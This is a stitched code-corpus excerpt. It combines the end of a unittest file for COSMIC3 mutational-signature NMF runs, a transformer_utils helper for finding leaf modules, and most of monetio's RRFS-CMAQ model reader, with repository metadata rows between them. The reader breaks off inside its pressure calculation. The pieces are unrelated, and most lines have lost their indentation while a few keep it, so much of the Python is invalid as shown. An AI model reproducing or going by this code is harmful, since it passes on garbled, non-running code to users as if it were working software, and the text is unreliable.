self.assertEqual(np.linalg.norm(cosine_df_arrow.values - cosine_df_word.values),0)
def test_sbs_cosmic3(self):
"""Test SBS Cosmic3"""
dirpath = tempfile.mkdtemp()
np.random.seed(0)
spectra = file_loader(SPECTRA_ARROW)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_arrow = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
ref_cosine = np.load("refs/test_mapping_cosmic3.npy")
self.assertEqual(np.linalg.norm(ref_cosine - cosine_df_arrow.sum(1).values),0)
        dirpath = tempfile.mkdtemp()  # re-create the scratch dir removed above so the second run has a valid outdir
        np.random.seed(0)
spectra = file_loader(SPECTRA_WORD)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_word = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
self.assertEqual(np.linalg.norm(cosine_df_arrow.values - cosine_df_word.values),0)
def test_sbs_cosmic3exome(self):
"""Test SBS Cosmic3 Exome"""
dirpath = tempfile.mkdtemp()
np.random.seed(0)
spectra = file_loader(SPECTRA_ARROW)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3_exome', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_arrow = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
ref_cosine = np.load("refs/test_mapping_cosmic3_exome.npy")
self.assertEqual(np.linalg.norm(ref_cosine - cosine_df_arrow.sum(1).values),0)
        dirpath = tempfile.mkdtemp()  # re-create the scratch dir removed above so the second run has a valid outdir
        np.random.seed(0)
spectra = file_loader(SPECTRA_WORD)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3_exome', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_word = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
self.assertEqual(np.linalg.norm(cosine_df_arrow.values - cosine_df_word.values),0)
if __name__ == '__main__':
unittest.main()
| 39.869048 | 118 | 0.696327 | 2,933 | 0.875784 | 0 | 0 | 0 | 0 | 0 | 0 | 499 | 0.149 |
5fc5f8dbe2e450d186ac311e88fde09d3e71e36d | 767 | py | Python | src/transformer_utils/util/module_utils.py | cfoster0/transformer-utils | 4e4bc61adb331f90bb2a9a394db07e25eda87555 | [
"MIT"
] | 10 | 2021-07-11T07:32:35.000Z | 2022-02-16T16:46:19.000Z | src/transformer_utils/util/module_utils.py | cfoster0/transformer-utils | 4e4bc61adb331f90bb2a9a394db07e25eda87555 | [
"MIT"
] | null | null | null | src/transformer_utils/util/module_utils.py | cfoster0/transformer-utils | 4e4bc61adb331f90bb2a9a394db07e25eda87555 | [
"MIT"
] | 2 | 2021-05-24T22:50:28.000Z | 2021-09-14T16:14:10.000Z | from .python_utils import make_print_if_verbose
def get_child_module_by_names(module, names):
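    """Resolve a dotted attribute path on ``module``, e.g. names=["encoder", "layer1"]."""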
obj = module
for getter in map(lambda name: lambda obj: getattr(obj, name), names):
obj = getter(obj)
return obj
def get_leaf_modules(module, verbose=False):
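    """Return (names, modules) for every submodule that directly owns parameters.
    Walks ``module.named_parameters()`` and resolves each parameter's owning
    module, deduplicating owners along the way.
    """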
vprint = make_print_if_verbose(verbose)
names = []
leaves = []
handled = set()
for param_name in dict(module.named_parameters()).keys():
mod_name = param_name.rpartition(".")[0]
mod = get_child_module_by_names(module, mod_name.split("."))
if mod_name in handled:
continue
vprint((param_name, mod_name, mod))
names.append(mod_name)
leaves.append(mod)
handled.add(mod_name)
return names, leaves
| 23.96875 | 74 | 0.65189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0.007823 |
5fc75bc9dcba17efcc6fbd5b1c74a679be2c870d | 32,615 | py | Python | monetio/models/_rrfs_cmaq_mm.py | zmoon/monetio | c8326750fa5d2404ccec726a5088f9a0e7fd4c4a | [
"MIT"
] | 1 | 2022-02-18T22:49:23.000Z | 2022-02-18T22:49:23.000Z | monetio/models/_rrfs_cmaq_mm.py | zmoon/monetio | c8326750fa5d2404ccec726a5088f9a0e7fd4c4a | [
"MIT"
] | null | null | null | monetio/models/_rrfs_cmaq_mm.py | zmoon/monetio | c8326750fa5d2404ccec726a5088f9a0e7fd4c4a | [
"MIT"
] | 1 | 2022-02-04T19:09:32.000Z | 2022-02-04T19:09:32.000Z | """ RRFS-CMAQ File Reader """
import numpy as np
import xarray as xr
from numpy import concatenate
from pandas import Series
def can_do(index):
    # True if at least one of the requested species is present in the dataset
    return bool(index.max())
def open_mfdataset(
fname,
convert_to_ppb=True,
mech="cb6r3_ae6_aq",
var_list=None,
fname_pm25=None,
surf_only=False,
**kwargs
):
    # Like WRF-Chem, use var_list to decide whether sums need to be calculated, to speed this up.
"""Method to open RFFS-CMAQ dyn* netcdf files.
Parameters
----------
fname : string or list
fname is the path to the file or files. It will accept hot keys in
strings as well.
convert_to_ppb : boolean
If true the units of the gas species will be converted to ppbv
mech: str
Mechanism to be used for calculating sums. Mechanisms supported:
"cb6r3_ae6_aq"
var_list: list
List of variables to include in output. MELODIES-MONET only reads in
variables need to plot in order to save on memory and simulation cost
especially for vertical data. If None, will read in all model data and
calculate all sums.
fname_pm25: string or list
Optional path to the file or files for precalculated PM2.5 sums. It
will accept hot keys in strings as well.
surf_only: boolean
Whether to save only surface data to save on memory and computational
cost (True) or not (False).
Returns
-------
xarray.DataSet
RRFS-CMAQ model dataset in standard format for use in MELODIES-MONET
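    Examples
    --------
    A minimal sketch; the file pattern and variable names here are
    hypothetical::
        dset = open_mfdataset(
            "dynf*.nc",
            var_list=["o3", "PM25"],
            mech="cb6r3_ae6_aq",
            surf_only=True,
        )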
"""
# Get dictionary of summed species for the mechanism of choice.
dict_sum = dict_species_sums(mech=mech)
if var_list is not None:
# Read in only a subset of variables and only do calculations if needed.
var_list_orig = var_list.copy() # Keep track of the original list before changes.
list_calc_sum = []
list_remove_extra = [] # list of variables to remove after the sum to save in memory.
for var_sum in [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]:
if var_sum in var_list:
if var_sum == "PM25":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
elif var_sum == "PM10":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
else:
var_list.extend(dict_sum[var_sum])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum[var_sum])
var_list.remove(var_sum)
list_calc_sum.append(var_sum)
# append the other needed species.
var_list.append("lat")
var_list.append("lon")
var_list.append("phalf")
var_list.append("tmp")
var_list.append("pressfc")
var_list.append("dpres")
var_list.append("hgtsfc")
var_list.append("delz")
# Remove duplicates just in case:
var_list = list(dict.fromkeys(var_list))
list_remove_extra = list(dict.fromkeys(list_remove_extra))
# Select only those elements in list_remove_extra that are not in var_list_orig
list_remove_extra_only = list(set(list_remove_extra) - set(var_list_orig))
# If variables in pm25 files are included remove these as these are not in the main file
# And will be added later.
for pm25_var in [
"PM25_TOT",
"PM25_TOT_NSOM",
"PM25_EC",
"PM25_NH4",
"PM25_NO3",
"PM25_SO4",
"PM25_OC",
"PM25_OM",
]:
if pm25_var in var_list:
var_list.remove(pm25_var)
# open the dataset using xarray
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)[var_list]
else:
# Read in all variables and do all calculations.
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)
list_calc_sum = [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]
if fname_pm25 is not None:
# Add the processed pm2.5 species.
dset_pm25 = xr.open_mfdataset(fname_pm25, concat_dim="time", combine="nested", **kwargs)
dset_pm25 = dset_pm25.drop(
labels=["lat", "lon", "pfull"]
) # Drop duplicate variables so can merge.
# Slight differences in pfull value between the files, but I assume that these still represent the
# same pressure levels from the model dynf* files.
# Attributes are formatted differently in pm25 file so remove attributes and use those from dynf* files.
dset_pm25.attrs = {}
dset = dset.merge(dset_pm25)
# Standardize some variable names
dset = dset.rename(
{
"grid_yt": "y",
"grid_xt": "x",
"pfull": "z",
"phalf": "z_i", # Interface pressure levels
"lon": "longitude",
"lat": "latitude",
"tmp": "temperature_k", # standard temperature (kelvin)
"pressfc": "surfpres_pa",
"dpres": "dp_pa", # Change names so standard surfpres_pa and dp_pa
"hgtsfc": "surfalt_m",
"delz": "dz_m",
}
) # Optional, but when available include altitude info
# Calculate pressure. This has to go before sorting because ak and bk
# are not sorted as they are in attributes
dset["pres_pa_mid"] = _calc_pressure(dset)
# Adjust pressure levels for all models such that the surface is first.
dset = dset.sortby("z", ascending=False)
dset = dset.sortby("z_i", ascending=False)
# Note this altitude calcs needs to always go after resorting.
# Altitude calculations are all optional, but for each model add values that are easy to calculate.
dset["alt_msl_m_full"] = _calc_hgt(dset)
dset["dz_m"] = dset["dz_m"] * -1.0 # Change to positive values.
# Set coordinates
dset = dset.reset_index(
["x", "y", "z", "z_i"], drop=True
) # For now drop z_i no variables use it.
dset["latitude"] = dset["latitude"].isel(time=0)
dset["longitude"] = dset["longitude"].isel(time=0)
dset = dset.reset_coords()
dset = dset.set_coords(["latitude", "longitude"])
# These sums and units are quite expensive and memory intensive,
# so add option to shrink dataset to just surface when needed
if surf_only:
dset = dset.isel(z=0).expand_dims("z", axis=1)
# Need to adjust units before summing for aerosols
# convert all gas species to ppbv
if convert_to_ppb:
for i in dset.variables:
if "units" in dset[i].attrs:
if "ppmv" in dset[i].attrs["units"]:
dset[i] *= 1000.0
dset[i].attrs["units"] = "ppbv"
# convert "ug/kg to ug/m3"
for i in dset.variables:
if "units" in dset[i].attrs:
if "ug/kg" in dset[i].attrs["units"]:
# ug/kg -> ug/m3 using dry air density
dset[i] = dset[i] * dset["pres_pa_mid"] / dset["temperature_k"] / 287.05535
dset[i].attrs["units"] = r"$\mu g m^{-3}$"
# add lazy diagnostic variables
    # Note that because there are so many species to sum, summing the aerosols slows down the code.
if "PM25" in list_calc_sum:
dset = add_lazy_pm25(dset, dict_sum)
if "PM10" in list_calc_sum:
dset = add_lazy_pm10(dset, dict_sum)
if "noy_gas" in list_calc_sum:
dset = add_lazy_noy_g(dset, dict_sum)
if "noy_aer" in list_calc_sum:
dset = add_lazy_noy_a(dset, dict_sum)
if "nox" in list_calc_sum:
dset = add_lazy_nox(dset, dict_sum)
if "pm25_cl" in list_calc_sum:
dset = add_lazy_cl_pm25(dset, dict_sum)
if "pm25_ec" in list_calc_sum:
dset = add_lazy_ec_pm25(dset, dict_sum)
if "pm25_ca" in list_calc_sum:
dset = add_lazy_ca_pm25(dset, dict_sum)
if "pm25_na" in list_calc_sum:
dset = add_lazy_na_pm25(dset, dict_sum)
if "pm25_nh4" in list_calc_sum:
dset = add_lazy_nh4_pm25(dset, dict_sum)
if "pm25_no3" in list_calc_sum:
dset = add_lazy_no3_pm25(dset, dict_sum)
if "pm25_so4" in list_calc_sum:
dset = add_lazy_so4_pm25(dset, dict_sum)
if "pm25_om" in list_calc_sum:
dset = add_lazy_om_pm25(dset, dict_sum)
# Change the times to pandas format
dset["time"] = dset.indexes["time"].to_datetimeindex(unsafe=True)
    # Turn off the warning for now; it only occurs because the model uses a Julian calendar.
    # Drop extra variables that were part of a sum but are not in the original var_list,
    # to save memory and computational time.
    # This is only relevant if var_list is provided.
if var_list is not None:
if bool(list_remove_extra_only): # confirm list not empty
dset = dset.drop_vars(list_remove_extra_only)
return dset
def _get_keys(d):
"""Calculates keys
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
list
list of keys
"""
keys = Series([i for i in d.data_vars.keys()])
return keys
def add_lazy_pm25(d, dict_sum):
"""Calculates PM2.5 sum. 20% of coarse mode is included in PM2.5 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM2.5 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
weights = Series(
concatenate(
[
np.ones(len(dict_sum["aitken"])),
np.ones(len(dict_sum["accumulation"])),
np.full(len(dict_sum["coarse"]), 0.2),
]
)
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["PM25"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["PM25"] = d["PM25"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM2.5",
"long_name": "PM2.5 calculated by MONET assuming coarse mode 20%",
}
)
return d
def add_lazy_pm10(d, dict_sum):
"""Calculates PM10 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM10 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["PM10"] = add_multiple_lazy2(d, newkeys)
d["PM10"] = d["PM10"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM10",
"long_name": "Particulate Matter < 10 microns",
}
)
return d
def add_lazy_noy_g(d, dict_sum):
"""Calculates NOy gas
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy gas calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_gas"])
weights = Series(dict_sum["noy_gas_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["noy_gas"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["noy_gas"] = d["noy_gas"].assign_attrs({"name": "noy_gas", "long_name": "NOy gases"})
return d
def add_lazy_noy_a(d, dict_sum):
"""Calculates NOy aerosol
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy aerosol calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_aer"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["noy_aer"] = add_multiple_lazy2(d, newkeys)
d["noy_aer"] = d["noy_aer"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "noy_aer", "long_name": "NOy aerosol"}
)
return d
def add_lazy_nox(d, dict_sum):
"""Calculates NOx
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOx calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["nox"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["nox"] = add_multiple_lazy2(d, newkeys)
d["nox"] = d["nox"].assign_attrs({"name": "nox", "long_name": "nox"})
return d
def add_lazy_cl_pm25(d, dict_sum):
"""Calculates sum of particulate Cl.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CLf calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_cl"])
weights = Series(dict_sum["pm25_cl_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_cl"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_cl"] = d["pm25_cl"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_cl",
"long_name": "PM2.5 CL assuming coarse mode 20%",
}
)
return d
def add_lazy_ec_pm25(d, dict_sum):
"""Calculates sum of particulate EC.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new EC calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ec"])
weights = Series(dict_sum["pm25_ec_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ec"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ec"] = d["pm25_ec"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ec",
"long_name": "PM2.5 EC assuming coarse mode 20%",
}
)
return d
def add_lazy_ca_pm25(d, dict_sum):
"""Calculates sum of particulate CA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ca"])
weights = Series(dict_sum["pm25_ca_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ca"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ca"] = d["pm25_ca"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ca",
"long_name": "PM2.5 CA assuming coarse mode 20%",
}
)
return d
def add_lazy_na_pm25(d, dict_sum):
"""Calculates sum of particulate NA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_na"])
weights = Series(dict_sum["pm25_na_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_na"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_na"] = d["pm25_na"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_na",
"long_name": "PM2.5 NA assuming coarse mode 20%",
}
)
return d
def add_lazy_nh4_pm25(d, dict_sum):
"""Calculates sum of particulate NH4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NH4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_nh4"])
weights = Series(dict_sum["pm25_nh4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_nh4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_nh4"] = d["pm25_nh4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_nh4",
"long_name": "PM2.5 NH4 assuming coarse mode 20%",
}
)
return d
def add_lazy_no3_pm25(d, dict_sum):
"""Calculates sum of particulate NO3.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NO3 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_no3"])
weights = Series(dict_sum["pm25_no3_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_no3"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_no3"] = d["pm25_no3"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_no3",
"long_name": "PM2.5 NO3 assuming coarse mode 20%",
}
)
return d
def add_lazy_so4_pm25(d, dict_sum):
"""Calculates sum of particulate SO4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new SO4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_so4"])
weights = Series(dict_sum["pm25_so4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_so4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_so4"] = d["pm25_so4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_so4",
"long_name": "PM2.5 SO4 assuming coarse mode 20%",
}
)
return d
def add_lazy_om_pm25(d, dict_sum):
"""Calculates sum of particulate OM.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new OM calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_om"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["pm25_om"] = add_multiple_lazy2(d, newkeys)
d["pm25_om"] = d["pm25_om"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "pm25_om", "long_name": "PM2.5 OM"}
)
return d
def add_multiple_lazy(dset, variables, weights=None):
"""Sums variables
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
variables : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
from numpy import ones
if weights is None:
weights = ones(len(variables))
else:
weights = weights.values
variables = variables.values
new = dset[variables[0]].copy() * weights[0]
for i, j in zip(variables[1:], weights[1:]):
new = new + dset[i] * j
return new
def add_multiple_lazy2(dset, variables, weights=None):
"""Sums variables. This is similar to add_multiple_lazy, but is a little
faster.
    Parameters
    ----------
    dset : xarray.Dataset
        RRFS-CMAQ model data
    variables : pandas.Series
        series of variables
    weights : pandas.Series, optional
        series of weights to apply to each variable during the sum
    Returns
    -------
    xarray.DataArray
        Weighted sum of all specified variables
"""
dset2 = dset[variables.values]
if weights is not None:
for i, j in zip(variables.values, weights.values):
dset2[i] = dset2[i] * j
new = dset2.to_array().sum("variable")
return new
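# --- Editor's note: illustrative sketch, not part of the original module. ---
# How add_multiple_lazy2 combines species: the selected variables are stacked
# into a new "variable" dimension and reduced, which Dask evaluates lazily.
# The toy dataset below is made up.
def _example_weighted_sum():
    ds = xr.Dataset({"a": ("x", [1.0, 2.0]), "b": ("x", [10.0, 20.0])})
    out = add_multiple_lazy2(ds, Series(["a", "b"]), weights=Series([1.0, 0.2]))
    return out  # expected values: [1 + 2, 2 + 4] = [3.0, 6.0]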
def _predefined_mapping_tables(dset):
"""Predefined mapping tables for different observational parings used when
combining data.
Returns
-------
dictionary
dictionary defining default mapping tables
"""
to_improve = {}
to_nadp = {}
to_aqs = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_airnow = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_crn = {}
to_aeronet = {}
to_cems = {}
mapping_tables = {
"improve": to_improve,
"aqs": to_aqs,
"airnow": to_airnow,
"crn": to_crn,
"cems": to_cems,
"nadp": to_nadp,
"aeronet": to_aeronet,
}
dset = dset.assign_attrs({"mapping_tables": mapping_tables})
return dset
# For the different mechanisms, just update these arrays as needed.
def dict_species_sums(mech):
"""Predefined mapping tables for different observational parings used when
combining data.
Parameters
----------
mech : string
mechanism name
Returns
-------
dictionary
dictionary defining the variables to sum based on the specified mechanism
"""
if mech == "cb6r3_ae6_aq":
sum_dict = {}
# Arrays for different gasses and pm groupings
sum_dict.update(
{
"accumulation": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
sum_dict.update(
{
"accumulation_wopc": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
]
}
)
sum_dict.update(
{
"aitken": [
"aso4i",
"ano3i",
"anh4i",
"anai",
"acli",
"aeci",
"aothri",
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
]
}
)
sum_dict.update(
{"coarse": ["asoil", "acors", "aseacat", "aclk", "aso4k", "ano3k", "anh4k"]}
)
sum_dict.update(
{
"noy_gas": [
"no",
"no2",
"no3",
"n2o5",
"hono",
"hno3",
"pna",
"cron",
"clno2",
"pan",
"panx",
"opan",
"ntr1",
"ntr2",
"intr",
]
}
)
sum_dict.update({"noy_gas_weight": [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]})
sum_dict.update(
{"noy_aer": ["ano3i", "ano3j", "ano3k"]}
) # Need to confirm here if there is a size cutoff for noy obs?
sum_dict.update({"nox": ["no", "no2"]})
sum_dict.update({"pm25_cl": ["acli", "aclj", "aclk"]})
sum_dict.update({"pm25_cl_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_ec": ["aeci", "aecj"]})
sum_dict.update({"pm25_ec_weight": [1, 1]})
sum_dict.update({"pm25_na": ["anai", "anaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_na_weight": [1, 1, 0.2 * 0.8373, 0.2 * 0.0626, 0.2 * 0.0023]})
sum_dict.update({"pm25_ca": ["acaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_ca_weight": [1, 0.2 * 0.0320, 0.2 * 0.0838, 0.2 * 0.0562]})
sum_dict.update({"pm25_nh4": ["anh4i", "anh4j", "anh4k"]})
sum_dict.update({"pm25_nh4_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_no3": ["ano3i", "ano3j", "ano3k"]})
sum_dict.update({"pm25_no3_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_so4": ["aso4i", "aso4j", "aso4k"]})
sum_dict.update({"pm25_so4_weight": [1, 1, 0.2]})
sum_dict.update(
{
"pm25_om": [
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
else:
raise NotImplementedError(
"Mechanism not supported, update _rrfs_cmaq_mm.py file in MONETIO"
)
return sum_dict
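# --- Editor's note: illustrative usage, not part of the original module. ---
# The returned dictionary feeds the add_lazy_* helpers above, e.g.:
#     dict_sum = dict_species_sums("cb6r3_ae6_aq")
#     dset = add_lazy_pm25(dset, dict_sum)  # aitken + accumulation + 0.2 * coarse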
def _calc_hgt(f):
"""Calculates the geopotential height in m from the variables hgtsfc and
delz. Note: To use this function the delz value needs to go from surface
to top of atmosphere in vertical. Because we are adding the height of
each grid box these are really grid top values
Parameters
----------
f : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xr.DataArray
        Geopotential height with attributes.
"""
sfc = f.surfalt_m.load()
dz = f.dz_m.load() * -1.0
    # These are negative in RRFS-CMAQ, but the levels were resorted and are summed
    # from the surface upward, so make them positive.
dz[:, 0, :, :] = dz[:, 0, :, :] + sfc # Add the surface altitude to the first model level only
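    # full-window rolling sum with min_periods=1 == cumulative sum from the surface upward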
z = dz.rolling(z=len(f.z), min_periods=1).sum()
z.name = "alt_msl_m_full"
z.attrs["long_name"] = "Altitude MSL Full Layer in Meters"
z.attrs["units"] = "m"
return z
def _calc_pressure(dset):
"""Calculate the mid-layer pressure in Pa from surface pressure
and ak and bk constants.
Interface pressures are calculated by:
phalf(k) = a(k) + surfpres * b(k)
Mid layer pressures are calculated by:
pfull(k) = (phalf(k+1)-phalf(k))/log(phalf(k+1)/phalf(k))
Parameters
----------
dset : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.DataArray
Mid-layer pressure with attributes.
"""
pres = dset.dp_pa.copy().load() # Have to load into memory here so can assign levels.
srfpres = dset.surfpres_pa.copy().load()
for k in range(len(dset.z)):
pres_2 = dset.ak[k + 1] + srfpres * dset.bk[k + 1]
pres_1 = dset.ak[k] + srfpres * dset.bk[k]
